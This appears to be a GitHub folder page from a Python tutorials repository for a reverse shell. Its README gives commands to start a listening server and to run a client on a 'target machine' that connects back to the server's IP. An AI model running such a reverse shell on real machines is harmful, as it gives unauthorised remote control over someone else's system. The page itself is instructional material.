Skip to content

Files

Latest commit

272e14b · Apr 27, 2021

History

History
This branch is 33 commits behind x4nth055/pythoncode-tutorials:master.

reverse_shell

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
Apr 27, 2021
Apr 27, 2021
Apr 27, 2021

You don't need to install anything.

  • To run the server, simply write:
    python server.py
    
    Output:
    Listening as 0.0.0.0:5003 ...
    
  • Running the client (target machine) that connects to 192.168.1.104 (server's IP Address) :
    python client.py 192.168.1.104
    
  • The server will get notified once a client is connected.